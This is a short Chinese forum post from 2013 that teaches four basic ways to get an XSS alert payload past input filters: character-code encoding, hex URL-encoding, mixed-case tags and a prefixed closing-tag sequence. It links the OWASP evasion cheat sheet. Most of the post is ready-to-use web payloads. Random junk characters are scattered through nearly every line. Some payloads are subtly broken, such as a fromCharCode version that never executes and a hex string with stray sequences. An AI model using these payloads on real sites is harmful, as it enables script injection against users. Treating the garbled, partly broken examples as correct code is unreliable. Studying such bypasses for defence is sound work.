找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2041|回复: 0
打印 上一主题 下一主题

XSS 绕过技术

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-14 00:10:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
四种超级基础的绕过方法。
7 a# Y% V, |2 F1.转换为ASCII码
: {9 y2 ^) _& Z# g7 N) X' z例子:原脚本为<script>alert(‘I love F4ck’)</script >
. M6 A& V4 Z0 `5 `; [6 B通过转换,变成:& _, k; L; `2 f4 ~; ^
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>8 u& N) e  p1 Q: g

( x6 D! C5 X2 u& _9 n) W0 h2 f) c! k! ]2.转换为HEX(十六进制)
( X( U; {% b0 ?9 X# ?例子:原脚本为<script>alert(‘I love F4ck’)</script>
3 K* T: V6 c! J5 Z通过转换,变成:% {& c% l0 {: ^" m& M
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
4 l% @5 W, z& ^ 7 G; R! y) A; b) Q. i! B
3.转换脚本的大小写  e! B# m% ?0 d+ I1 T- t, u
例子:原脚本为<script>alert(‘I love F4ck’)</script>" a6 _9 [; s, }# i
转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>
( v4 D$ h7 S! K4 P9 ~) Z3 R& C 9 K7 P' d) M- f( R
4.增加闭合标记”>
- z5 ?6 ~( V$ k; u3 d例子:原脚本为<script>alert(‘I love F4ck’)</script>9 c2 d' ?3 b4 Z. y; P5 w1 j
转换为:”><script>alert(‘I love F4ck’)</script>5 s3 J# _" D" |; t& v0 C9 Y
更详细绕过技术请参考此网页4 R8 @  w) e: E5 A$ ~* e
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet" G/ g. }) w) \! m# \
% J! z7 M# K# y8 I0 l& i, H9 b
转换工具使用的是火狐的 hackbar mozilla addon.
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表